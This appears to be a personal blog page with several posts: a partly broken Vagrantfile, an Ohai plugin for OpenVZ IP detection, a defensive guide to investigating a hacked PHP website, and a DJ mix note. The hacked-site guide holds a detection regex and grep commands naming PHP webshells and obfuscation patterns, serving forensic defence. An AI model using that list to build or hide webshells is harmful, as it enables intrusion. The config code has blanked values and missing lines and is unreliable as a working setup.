My VagrantFile

This is the Vagrantfile I am using for my development box at home and work. It is determines how much ram is available and how I want to allocate, how many CPUs are available, and configures the VM for me. I use NFS for shared folders. Finally, starting to use “hostupdater” to keep my host machines hosts file current.

I would love to make that more dynamic, based on the Apache vhosts I have configured in the VM. Something to work towards I suppose.

The base box was provisioned using Packer and Chef.

# -*- mode: ruby -*-
# vi: set ft=ruby :

# Using the following plugins:
# `vagrant plugin install vagrant-hostsupdater`

    'projects_path' => "#{ENV['HOME']}/Development/projects",
    'hostname' => "#{ENV['USER']}-web",
    'ip' => '',
    'max_ram' => 3 # 4 = 1/4 of the system ram, 2= 1/3, 2 = 1/2, 

# Vagrantfile API/syntax version. Don't touch unless you know what you're doing!

Vagrant.configure(VAGRANTFILE_API_VERSION) do |config| = "ns-centos65"
  config.vm.host_name = PARAMS['hostname']

  # Setup network :forwarded_port, guest: 22, host: 2222, id: "ssh", disabled: true :forwarded_port, guest: 22, host: 2210, auto_correct: true # ssh :forwarded_port, guest: 80, host: 8010 # http :forwarded_port, guest: 3000, host: 3000 # rails/webrick :forwarded_port, guest: 8080, host: 8080 # xhprof gui "private_network", ip: PARAMS['ip']

  # Setup synced folders
  config.vm.synced_folder PARAMS['projects_path'], "/var/www/projects", nfs: true
  # Setup /etc/hosts on host
  config.hostsupdater.aliases = %w(rlug.local roylindauer.local trap.local estimator.local)

  # Setup VM params based on host resources
  host = RbConfig::CONFIG['host_os']
  # Provider-specific configuration so you can fine-tune various
  # backing providers for Vagrant. These expose provider-specific options.
  # Example for VirtualBox:
  config.vm.provider "virtualbox" do |vb|
  # Give VM 1/4 system memory & access to all cpu cores on the host
  if host =~ /darwin/
    cpus = `sysctl -n hw.ncpu`.to_i
    # sysctl returns Bytes and we need to convert to MB
    mem = `sysctl -n hw.memsize`.to_i / 1024 / 1024 / PARAMS['max_ram']
  elsif host =~ /linux/
    cpus = `nproc`.to_i
    # meminfo shows KB and we need to convert to MB
    mem = `grep 'MemTotal' /proc/meminfo | sed -e 's/MemTotal://' -e 's/ kB//'`.to_i / 1024 / PARAMS['max_ram']
  else # sorry Windows folks, I can't help you
    cpus = 2
    mem = 1024

    vb.gui = true = "Web_Development_LAMP"
    vb.customize ["modifyvm", :id, "--memory", mem]
    vb.customize ["modifyvm", :id, "--cpus", cpus]
    vb.customize ["modifyvm", :id, "--natdnshostresolver1", "on"]
    vb.customize ["modifyvm", :id, "--natdnsproxy1", "on"]



Ohai Plugin for OpenVZ VMs to get public IP Address

Media Temple uses the OpenVZ virtualization system and I have quite a few Media Temple servers under Chef management. The one thing that has made management difficult is that by default during a Chef run ohai returns as the default IP address which means I cannot run knife to execute commands from my workstation.

For example, when I run knife node show  I get the following:

$ knife node show

Node Name:
Environment: production

Kinda sucks. If try to execute on all of my MT servers, say something like knife ssh ‘tags:mt’ ‘sudo chef-client’  I will get a ton of failed connection errors because it is trying to connect to

The solution is to get ohai to return the correct IP. OpenVZ has virtual interfaces and the actual public IP is assigned to them, while the main interface, eth0, is given the ip This ohai plugin will retrieve the correct IP.

provides "ipaddress"
require_plugin "#{os}::network"
require_plugin "#{os}::virtualization"

if virtualization["system"] == "openvz"
  network["interfaces"]["venet0:0"]["addresses"].each do |ip, params|
    if params["family"] == "inet"
      ipaddress ip

Put this in your ohai plugins directory for chef: /etc/chef/plugins/openvz.rb and when chef runs, it will get the correct IP address.

Now when I run knife show

$ knife node show

Node Name:
Environment: production


What to do when your website is hacked/exploited

So your website has been “hacked”? You load your website in your browser, and are redirected to some spammers website, or maybe you google’d yourself (naughty), and found a few thousand indexed pages for knock off prada gear? Ok, so how do you fix this, and more importantly, how do you learn how they did it so you can defend against it later.


Secure the scene

The first thing I do is take a snapshot of the hacked web site. I want the entire webroot, and the access and error logs so that I can review them.

cd /var/www/vhosts/
tar -zcf 20150101-siteexploit-evidence.tar httpdocs logs/access_log* logs/error_log*

At this point I want to either shutdown the web server, or just restore the site and get back to the investigation. I would shut down if I felt the exploit was serious enough to warrant more serious action. Otherwise, just restore from backup, or checkout your repo, whatever you gotta do.

Here is where the fun begins. Try to figure out when, and how, your site was exploited. First things first, take an inventory of the scene.

Looking For Clues to how the site was hacked

Run the last command for suspicious logins. “last” will show a listing of last logged in users. Maybe someone SSH’d into your machine (hopefully not!) or logged in via FTP. If you see a suspicious IP in last then chances are someone has initiated the attack by simply uploading a file through FTP or SCP.

Check for modified files. If you are seeing files modified recently that you did not edit yourself they are suspect and probably contain malicious code. Check the modification timestamp on those files. That date will be useful when looking through the access logs. If you know that you have not made changes to your site in {n} days use that as the basis for your search:

find . -type f -mtime -{n} -print > modified_files.txt

Replace {n} with an actual number.

Scan all files in the webroot for common exploit signatures. If you find a lot of eval(gzinflate then you can almost be certain that it is malicious code. A good rule of thumb is eval is “evil”, except when it’s not (protip: it usually is).

grep -ir 'gzinflate\(base64_decode' *.php > suspect_files.txt

Here is a bash script that checks for common exploits:

pattern='r0nin|m0rtix|upl0ad|r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|vandal|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|Webshell|get_pass|PhpConfigSpy|SubhashDasyam|(eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11))|earnmoneydo'
grep $pattern $searchpath -roE --include=*.php* | sort

That will check all .php files under /var/www/vhosts for common php shells and exploits.

Collect Evidence

Ok, so you have a date, maybe a date range, and a list of potentially suspect files. With that information it’s time to start looking at logs. The goal is to be able to determine when, and potentially how, the attacker exploited the site.

There are 5 common vulnerabilities attackers exploit.

  1. Remote code execution
  2. SQL injection
  3. Format string vulnerabilities
  4. Cross Site Scripting (XSS)
  5. Username enumeration

All web developers should be familiar with the OWASP top 10 too. Anyways, you want to look for signs of those types of attacks. I scan my access logs and typically check for the following things:

  • Check for POST requests to suspicious locations, such as a file upload location, or other areas that are not accessed directly (like an includes directory, or theme directory).
  • Check for GET or POST requests with a remote URL as a parameter, such as /page/?url=
  • Check for GET or POST requests to the files you found when scanning the site for malicious code
  • Check for very odd query parameters in GET and POST requests
  • You should know your site, check for requests that are just out of the ordinary

When you find suspicious entries in your logs, take note of the IP addresses. Scan your logs for all entries for that IP, you might be able to find when the exploit occurred. If you do, you then know the requests that might have been the culprit, or at least have a date range for when the exploit took place. Check the logs around that date range. It could be that the attacker initiated the exploit through a proxy, and finished the work through another one.

Take Action

I recently had a clients website get exploited. The attacker modified dozens of PHP scripts, uploaded about 30 different PHP shells, and just generally made a mess of things. Most of the modified files had the same modification timestamp, so using that I checked the logs and found that someone had been crafting POSTs to a file upload plugin for a wysiwyg editor. Looking into that plugin, I found that they were able to upload a PHP shell. I quickly removed the plugin, restored the modified files, and removed all of the uploaded PHP shells.

The exploit showed me that the security of the website and server were severely lacking. Some  fundamental security precautions were not implemented. Such as allowing script execution in a user upload directory. That should just never happen. I setup some rules to disable script execution in specific directories, disable direct access to other directories, secured file and directory permissions.

I also setup fail2ban on the clients server. Fail2ban is great for monitoring logs and looking for certain signatures, and then banning the offending IP. You can define other actions to take, such as emailing you or something, but I just want to block their access to the server. So, ban via iptables. I noticed that this particular attacker was sending a lot of POST requests at the same time, so I setup a fail2ban filter to handle a postflood. You will probably want to setup filters for dealing with failed log in attempts to the server, and to address any of the other suspicious activity you found in your logs.

You will definitely want to update your CMS and update any 3rd party dependencies. Doing that alone will go a long way towards keeping your site exploit free.

Wrap up

Security is hard. It’s a never ending battle. And you will never, ever, make your site 100% safe and secure. The best thing to do is have a recovery plan. When your site is exploited can you recover? If you can answer yes to that, you are in a good place.

Best Laid Plans

I had originally planned to play this set for Zombie Crawl, but ended up changing gears once the party go going. I liked this one though, so here we are.

[update 11/19]

This mix has been featured on the Source Tribe podcast.

Check it out: &

Somehow this thing has gotten over 7000 views in the last 2 days! Crazy